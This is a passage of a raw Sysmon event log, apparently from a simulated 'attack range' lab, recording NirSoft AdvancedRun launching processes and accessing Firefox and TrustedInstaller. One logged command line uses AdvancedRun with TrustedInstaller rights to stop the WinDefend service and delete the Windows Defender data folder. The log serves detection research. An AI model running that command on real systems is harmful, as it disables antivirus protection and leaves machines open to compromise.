\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003910115Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.040{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you 
choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000002970304Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:23:59.707{834264DD-E0FF-61E9-1462-000000002402}1724C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "$env:TEMP\advancedrun\AdvancedRun.exe /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run & $env:TEMP\advancedrun\AdvancedRun.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000002968734Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.869{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 
10341000x80000000000000002968733Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.869{834264DD-0AB0-61E7-1600-000000002402}12921804C:\Windows\system32\svchost.exe{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000002968732Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.869{834264DD-0AB0-61E7-1600-000000002402}12921804C:\Windows\system32\svchost.exe{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000002968679Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.706{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968678Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.727{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft 
CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968601Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.668{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968576Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.662{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968551Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.651{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000002968526Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.650{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968501Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.624{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968476Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.620{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000002968450Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.760{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E081-61E9-0362-000000002402}5344C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968449Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.759{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E081-61E9-0362-000000002402}5344C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968448Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.759{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DCE0-61E9-5961-000000002402}7332C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968447Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.759{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D73E-61E9-AF60-000000002402}6528C:\Program Files\Mozilla 
Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968446Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.759{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6B2-61E9-9C60-000000002402}7820C:\Program Files\Mozilla 
Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968445Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.759{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6AF-61E9-9B60-000000002402}7424C:\Program Files\Mozilla 
Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968444Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.758{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6AF-61E9-9A60-000000002402}7408C:\Program Files\Mozilla 
Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968443Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.758{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6AF-61E9-9960-000000002402}7400C:\Program Files\Mozilla 
Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968442Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.758{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6AD-61E9-9860-000000002402}5388C:\Program Files\Mozilla 
Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968441Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.758{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6AC-61E9-9660-000000002402}3000C:\Program Files\Mozilla 
Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968440Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.758{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6A9-61E9-9560-000000002402}32C:\Program Files\Mozilla 
